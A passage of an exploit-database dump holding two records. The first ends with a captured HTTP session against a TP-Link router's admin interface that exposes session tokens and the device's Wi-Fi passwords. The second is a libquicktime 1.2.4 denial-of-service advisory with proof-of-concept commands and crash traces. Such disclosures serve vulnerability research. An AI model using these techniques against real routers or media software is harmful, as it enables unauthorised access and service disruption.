\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 657,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:29.648+03:00\",\r\n \"time\": 1798,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 268,\r\n \"dns\": 250,\r\n \"connect\": 524,\r\n \"send\": 0,\r\n \"wait\": 748,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:39.644+03:00\",\r\n \"time\": 997,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 272,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 701,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:39.647+03:00\",\r\n \"time\": 1835,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 270,\r\n \"dns\": 251,\r\n \"connect\": 521,\r\n \"send\": 0,\r\n \"wait\": 785,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n }\r\n ]\r\n }\r\n}\r\n\r\n# You want to follow my activity ?\r\n\r\nhttps://www.linkedin.com/in/ismailtasdelen\r\nhttps://github.com/ismailtasdelen\r\nhttps://packetstormsecurity.com/user/ismailtasdelen\n\n# 0day.today [2018-07-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30759"}, {"lastseen": "2018-02-28T01:37:24", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-06-10T00:00:00", "published": "2017-06-10T00:00:00", "href": "https://0day.today/exploit/description/27921", "id": "1337DAY-ID-27921", "title": "libquicktime 1.2.4 - Denial of Service Vulnerability", "type": "zdt", "sourceData": "libquicktime multiple vulnerabilities\r\n \r\n \r\n================\r\nAuthor : qflb.wu\r\n===============\r\n \r\n \r\nIntroduction:\r\n=============\r\nThe libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.\r\n \r\n \r\nAffected version:\r\n=====\r\n1.2.4\r\n \r\n \r\nVulnerability Description:\r\n==========================\r\n##################################\r\n1.\r\nthe quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\nCVE:\r\nCVE-2017-9122\r\n \r\n \r\n###################################\r\n2.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\n \r\n \r\nASAN:SIGSEGV\r\n=================================================================\r\n==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)\r\n==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)\r\n #1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)\r\n #2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)\r\n #3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14254==ABORTING\r\n \r\n \r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n...\r\nStopped reason: SIGSEGV\r\n0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>, \r\n constant=<optimized out>) at lqt_quicktime.c:1242\r\n1242 return\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\nCVE:\r\nCVE-2017-9123\r\n \r\n \r\n###################################\r\n3.\r\nthe quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\n \r\n \r\nASAN:SIGSEGV\r\n=================================================================\r\n==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)\r\n==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)\r\n #1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)\r\n #2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)\r\n #3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)\r\n #4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)\r\n #5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)\r\n #6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)\r\n #7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14359==ABORTING\r\n \r\n \r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\nStopped reason: SIGSEGV\r\n0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>, \r\n _output=<optimized out>) at util.c:874\r\n874if(input[0] == output[0] &&\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\nCVE:\r\nCVE-2017-9124\r\n \r\n \r\n###################################\r\n4.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528\r\nREAD of size 4 at 0x602000009cd4 thread T0\r\n #0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242\r\n #1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138\r\n #2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996\r\n #3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa\r\n 0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01\r\n 0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa\r\n=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 